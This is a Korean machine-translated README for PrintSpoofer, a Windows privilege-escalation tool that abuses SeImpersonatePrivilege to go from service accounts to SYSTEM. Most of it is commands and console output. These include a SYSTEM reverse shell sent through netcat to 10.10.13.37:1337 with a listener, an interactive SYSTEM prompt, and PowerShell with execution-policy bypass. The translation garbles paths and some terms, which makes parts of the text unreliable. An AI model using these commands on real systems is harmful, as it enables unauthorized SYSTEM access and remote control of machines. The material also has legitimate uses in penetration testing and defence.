인쇄Spoofer
PrintSpoofer
Windows 10 및 Server 2016/2019에서 SeImpersonatePrivilege
남용하여 LOCAL/NETWORK SERVICE에서 SYSTEM으로.
-h
옵션을 사용하면 도움말 메시지를 확인할 수 있다.
C:도구>PrintSpoofer.exe -h PrintSpoofer v0.1(@itm4n 제공) 현재 사용자에게 SeImpersonate 권한이 있는 경우 이 도구는 인쇄 기능을 활용합니다. SYSTEM 토큰을 가져온 다음 CreateProcessAsUser()를 사용하여 사용자 정의 명령을 실행하는 스풀러 서비스 인수: -c*CMD* 명령을 실행합니다. -i 현재 명령 프롬프트에서 새 프로세스와 상호 작용합니다(기본값은 비대화형입니다). -d 이 세션 *ID*에 해당하는 데스크탑에 새 프로세스를 생성합니다(qwinsta로 ID 확인). -h 그게 나야 :) 예: - 현재 콘솔에서 PowerShell을 SYSTEM으로 실행합니다. PrintSpoofer.exe -i -c powershell.exe - 세션 1의 데스크탑에 SYSTEM 명령 프롬프트를 생성합니다. PrintSpoofer.exe -d 1 -c cmd.exe - SYSTEM 리버스 쉘 얻기 PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
대화 형 셸이 있는 경우 현재 콘솔에서 새 SYSTEM 프로세스를 생성할 수 있습니다.
사용 사례 : 바인드 쉘, 리버스 쉘, psexec.py
등
C:도구>PrintSpoofer.exe -i -c cmd [+] 발견된 권한: SeImpersonatePrivilege [+] 명명된 파이프 청취... [+] CreateProcessAsUser() 확인 마이크로소프트 윈도우 [버전 10.0.19613.1000] (c) 2020년 마이크로소프트사. 모든 권리 보유. C:WINDOWSsystem32>whoami NT 권한 시스템
명령을 실행할 수 있지만 대화형 셸이 없는 경우 새 SYSTEM 프로세스를 생성하고 상호 작용 없이 즉시 종료할 수 있습니다.
사용 사례 : WinRM, WebShell, wmiexec.py
, smbexec.py
등
역방향 셸을 만듭니다.
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] 발견된 권한: SeImpersonatePrivilege [+] 명명된 파이프 청취... [+] CreateProcessAsUser() 확인
Netcat 수신기:
C:도구>nc.exe -l -p 1337 마이크로소프트 윈도우 [버전 10.0.19613.1000] (c) 2020년 마이크로소프트사. 모든 권리 보유. C:WINDOWSsystem32>whoami NT 권한 시스템
로컬로 로그온하거나 RDP(VDI 포함)를 통해 로그온 한 경우 데스크탑에 SYSTEM 명령 프롬프트를 생성할 수 있습니다. 먼저 qwinsta
명령을 사용하여 세션 ID를 확인한 다음 -d
옵션을 사용하여 이 값을 지정합니다.
사용 사례 : 터미널 세션(RDP), VDI
C:TOOLS>퀸스타 SESSIONNAME 사용자 이름 ID 상태 유형 장치 서비스 0 디스크 콘솔 관리자 1 활성 >rdp-tcp#3 실습-사용자 3 활성 rdp-tcp 65536 듣기 C:TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep 우회" [+] 발견된 권한: SeImpersonatePrivilege [+] 명명된 파이프 청취... [+] CreateProcessAsUser() 확인